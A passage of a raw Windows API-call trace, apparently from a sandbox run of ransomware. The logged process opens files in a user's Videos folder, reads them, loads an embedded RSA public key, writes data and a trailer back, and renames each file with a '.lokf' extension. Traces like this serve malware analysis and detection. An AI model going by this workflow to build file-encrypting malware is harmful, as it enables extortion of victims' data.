dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86220 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861f0 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861d8 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86bf0 | out: hHeap=0x660000) returned 1 [0061.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0061.062] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8dae8*, nNumberOfBytesToWrite=0x21e2, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8dae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x21e2, lpOverlapped=0x0) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8dae8 | out: hHeap=0x660000) returned 1 [0061.062] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x21e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.062] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.062] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.062] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.063] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.063] CloseHandle (hObject=0x5cc) returned 1 [0061.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0061.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0061.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0061.064] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\QnhLHVtA0q.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\qnhlhvta0q.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\QnhLHVtA0q.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\qnhlhvta0q.flv.lokf")) returned 1 [0061.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.064] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.065] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdacc50, ftCreationTime.dwHighDateTime=0x1d4d43e, ftLastAccessTime.dwLowDateTime=0xf5721650, ftLastAccessTime.dwHighDateTime=0x1d4c54f, ftLastWriteTime.dwLowDateTime=0xf5721650, ftLastWriteTime.dwHighDateTime=0x1d4c54f, nFileSizeHigh=0x0, nFileSizeLow=0xbe07, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R-9wIEAszo.mkv", cAlternateFileName="R-9WIE~1.MKV")) returned 1 [0061.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0061.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0061.065] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\R-9wIEAszo.mkv") returned=".mkv" [0061.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\R-9wIEAszo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\r-9wieaszo.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.065] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=48647) returned 1 [0061.066] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.068] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbde1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.068] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.069] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.069] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xbe07, lpOverlapped=0x0) returned 1 [0061.069] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.069] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.069] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.069] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.070] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.070] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.070] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.070] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.070] GetLastError () returned 0x0 [0061.070] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.070] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.070] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.070] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.070] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe10) returned 0x9c8dae8 [0061.071] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86bf0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861d8 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86c38 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861f0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86220 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86238 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0061.071] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86220 | out: hHeap=0x660000) returned 1 [0061.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86238 | out: hHeap=0x660000) returned 1 [0061.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86238 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86220 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86238 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86220 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.072] GetCurrentThreadId () returned 0x9e0 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c400 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.072] GetCurrentThreadId () returned 0x9e0 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86220 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86238 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86208 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86250 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86220 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86220 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86220 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 